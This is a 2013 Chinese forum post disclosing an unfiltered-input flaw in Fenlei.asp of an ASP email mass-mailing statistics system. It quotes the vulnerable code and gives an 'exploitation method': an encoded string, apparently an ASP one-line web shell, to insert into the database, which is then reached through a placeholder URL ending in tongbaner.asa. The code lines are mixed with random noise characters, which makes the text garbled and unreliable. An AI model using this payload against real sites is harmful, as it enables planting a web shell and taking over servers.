找回密码
 立即注册
查看: 2842|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
! ]& y( j" Q- L: k- P5 U
+ F7 D8 `; a; X/ NIF Request.QueryString("Action")="del" Then
/ G: o$ f. @/ X: M0 u! EID=Request.QueryString("ID")
6 @7 \$ N! x6 g' BIF Countss ("tui","Fenlei",ID )<>0 then . y5 k6 a) }  v; l0 Y5 O
'略
  }4 Z) c& V) E0 V+ gIF Request.QueryString("Action")="Add" Then
* F" Q+ S) U4 w- D" pTname=Request.Form("Typename")   E" }/ _# I4 z0 p$ K3 T) ^5 b1 p
Set Rs=Server.CreateObject("adodb.Recordset")
2 `+ I. O" w. _. V4 I, ZSql="Select * From Fenlei Order by id Desc "
  I2 F3 H4 _0 V& u( ~, e+ [Rs.Open Sql,Conn,1,3
+ ^/ Y6 `& z3 y% q7 k& \/ M7 FRs.Addnew # P4 g1 R+ Q) U0 T
Rs("Typename")=Tname 2 V' S; [" x/ f2 D3 y7 _
'略 # C7 S! s: q2 k2 Z# O7 c
Set Rs=Server.CreateObject("adodb.Recordset")
( h# A% D9 Y, S/ T1 HSql="Select * From Fenlei Order by id Desc "
# _, {8 X0 j( g, r  p; P; `* U) PRs.Open Sql,Conn,1,1
8 L( e& U# R4 T0 U; @! p9 z2 r* g'略
  v: y* k4 D0 O2 X%>
! j& C  Q9 S6 K9 l  N/ u
6 Q; [% ~2 [3 _( d! z
7 t2 Q" d5 Z1 z6 |  U
5 U% o" |0 w( l# a没有过滤,直接写入数据库。
- i* W1 a# d. D; C # [- M3 @$ K( P, ]6 M8 M1 b
利用方法:
* k/ Z  X# x" J# | * f4 v5 V+ H- \3 y. y- n
插入:┼攠數畣整爠煥敵瑳∨≡┩>/ |4 h9 \5 ~# A' X$ `% S# R

' U. g- K+ ?' r$ i( s: S 2 ?" W7 V0 l! G1 s) i
连接: http://www.xxx.com/###tongbaner.asa
( D, [' u0 T1 o1 @8 m) [. v- J. l  X'默认安装文件:
1 N0 f+ |: d; P5 H7 d'install.asp
1 n% `+ X+ a% }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表